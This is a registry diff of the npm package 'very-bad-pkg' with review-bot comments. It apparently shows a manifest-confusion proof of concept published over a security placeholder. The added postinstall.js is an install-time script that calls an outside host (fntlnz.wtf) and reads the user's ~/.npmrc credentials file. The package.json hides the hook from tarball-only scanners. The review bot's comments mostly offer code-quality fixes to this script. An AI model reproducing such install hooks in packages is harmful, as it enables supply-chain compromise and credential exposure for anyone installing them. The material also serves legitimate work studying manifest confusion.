very-bad-pkg 0.0.1-security → 1.0.4
- package/index.js +1 -0
- package/package.json +10 -4
- package/postinstall.js +43 -0
- package/README.md +0 -5
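--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1 @@
+console.log('listen!')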
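--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,12 @@
 {
-"name": "
-"version": "
-"
-"
+"name": "imposter-pkg",
+"version": "1.0.1",
+"main": "index.js",
+"keywords": ["manifest-confusion", "npm", "poc"],
+"description": "A PoC for manifest confusion (for testing purposes)",
+"scripts": {
+"test": "echo \"This pkg looks OK!\""
+},
+"author": "listen.dev Red Team",
+"license": "ISC"
 }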
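Review bot: The manifest shipped in this tarball does not describe the package being diffed: the page title says very-bad-pkg 1.0.4, while lines 2-3 declare `"name": "imposter-pkg"` and `"version": "1.0.1"`, and the `scripts` block on lines 7-9 contains only `test`, so nothing in this file registers the added `package/postinstall.js` as an install hook. If that script does run at install time, the hook must be declared somewhere this diff does not show, presumably the registry-side manifest, which is the manifest-confusion scenario the `keywords` entry names. Consumers and scanners that trust only the tarball's package.json would therefore see a package with no lifecycle scripts, so the divergence between the two manifests is itself the finding a reviewer should record, and the name/version mismatch should be compared against the registry document rather than taken at face value.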
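--- a/package/postinstall.js
+++ b/package/postinstall.js
@@ -0,0 +1,43 @@
+const https = require('https');
+const fs = require('fs');
+const path = require('path');
+const { execSync } = require('child_process');
+
+const OUTBOUND_URL = 'https://fntlnz.wtf'; // Replace with the desired outbound URL
+const OUTPUT_FILE_PATH = '/test/hello_dolphins.txt'; // Modify the file path as needed
+
+function makeOutboundConnection() {
+https.get(OUTBOUND_URL, (res) => {
+console.log(`Connected to ${OUTBOUND_URL}, statusCode: ${res.statusCode}`);
+// Do something with the response if needed
+res.on('data', (data) => {
+// Process the response data if necessary
+});
+}).on('error', (err) => {
+console.error('Error making outbound connection:', err.message);
+});
+}
+
+function writeFileWithDescription() {
+try {
+// Read npm_package_description from .npmrc
+const npmrcFilePath = path.join(process.env.HOME || process.env.USERPROFILE, '.npmrc');
+const npmrcContent = fs.readFileSync(npmrcFilePath, 'utf8');
+const npmPackageDescriptionMatch = npmrcContent.match(/npm_package_description=(.*)/);
+if (!npmPackageDescriptionMatch) {
+throw new Error('npm_package_description not found in .npmrc');
+}
+const npmPackageDescription = npmPackageDescriptionMatch[1];
+
+// Write the file with the npm_package_description
+const fileContent = `hello dolphins! npm_package_description: ${npmPackageDescription}\n`;
+fs.writeFileSync(OUTPUT_FILE_PATH, fileContent, 'utf8');
+console.log(`File written to ${OUTPUT_FILE_PATH}`);
+} catch (error) {
+console.error('An error occurred while writing the file:', error);
+}
+}
+
+// Call the functions to make the outbound connection and write the file
+makeOutboundConnection();
+writeFileWithDescription();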
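Review bot: `writeFileWithDescription` reads the whole of the user's `.npmrc` (lines 24-25) to look for `npm_package_description`, but that file normally holds registry configuration and auth tokens rather than package metadata, so the install script touches a credentials file for a value it can get without it; npm exposes package.json fields to lifecycle scripts as environment variables, so lines 24-30 reduce to `const npmPackageDescription = process.env.npm_package_description;` followed by `if (npmPackageDescription === undefined) throw new Error('npm_package_description not set');`. The `execSync` import on line 4 is never used and should be dropped, since an unused `child_process` import in an install script is exactly the kind of signal install-script scanners flag. `OUTPUT_FILE_PATH` on line 7 is an absolute path under `/test`, which will not exist on most hosts, so `writeFileSync` on line 34 fails with ENOENT and the catch on line 36 only logs it; if the write is part of what the PoC is meant to demonstrate, that failure should exit non-zero rather than be swallowed. The `data` handler on lines 13-15 does nothing with the response, so the `res.on('data', …)` block can go or the body should be consumed and discarded explicitly with a comment saying so.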
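--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=very-bad-pkg for more information.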